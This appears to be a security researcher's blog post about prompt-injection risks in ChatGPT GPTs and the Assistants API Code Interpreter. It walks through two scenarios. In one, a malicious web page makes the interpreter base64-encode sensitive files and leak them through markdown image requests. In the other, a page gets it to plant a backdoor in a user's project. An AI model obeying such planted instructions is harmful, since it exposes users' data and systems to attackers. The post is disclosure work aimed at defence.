back

GPTs and Assistants API: Data Exfiltration and Backdoor Risks in Code Interpreter

Introduction

OpenAI DevDay, in San Francisco. “You can build a GPT—a customized version of ChatGPT—for almost anything,” Sam Altman, OpenAI’s CEO, said at the event.

The update released by OpenAI introduces significant innovations and conveniences through customized ChatGPT versions (GPTs) and the Assistants API.

Let's take a closer look at the details of these innovations and their potential impacts:

Considering all these aspects, it seems that these features will lead to significant production due to the conveniences they provide. Moreover, potential security issues that may arise could affect large populations.

Some security issues I have observed are:

Scenario-1: Data Exfiltration via Code Interpreter

Situation: Alex is testing the Code Interpreter's ability to fetch data from the web. He navigates to different websites and scrapes content. While testing, Alex unknowingly navigates to a malicious website that has been compromised to exploit the Code Interpreter.

Exfiltration Process: The malicious website contains a script designed to search for sensitive files where Alex's Code Interpreter is running. The malicious prompt finds a file with sensitive information and uses base64 encoding to convert the file's contents into a string. This string is then embedded into a markdown image tag or any other markdown element that is designed to make a web request. When the Code Interpreter fetches the markdown content, it sends the base64-encoded string to the attacker's server disguised as a request for an image or another resource.

Figure-1: Navigate a malicious website and exfiltrate data using markdown.
Figure-2: Obtaining sensitive data via GET request.

Scenario-2: Code Interpreter Backdoor

Situation: Alex is working on a web development project and uses the Code Interpreter to check his HTML and JavaScript code snippets. He visits another website to get some inspiration for his project.

Backdoor Creation: The website Alex visits is malicious and contains a prompt crafted to exploit the Code Interpreter. When Alex's Code Interpreter executes the snippet from the website, the malicious JavaScript code injects a backdoor into Alex's project files.

This backdoor could manifest as a simple script that sends data to the attacker's server or allows the attacker to execute commands on the server hosting Alex's project.

Outcome: The attacker now has a way to remotely control or access Alex's project server, potentially leading to data theft, further injection of malware, or even a full-blown attack on the server's infrastructure.

Figure-3: Add malicious content to an existing HTML file.

References

Timeline

2023-11-12 - v1.0

2023-11-12 - v1.1

2023-11-13 - v1.2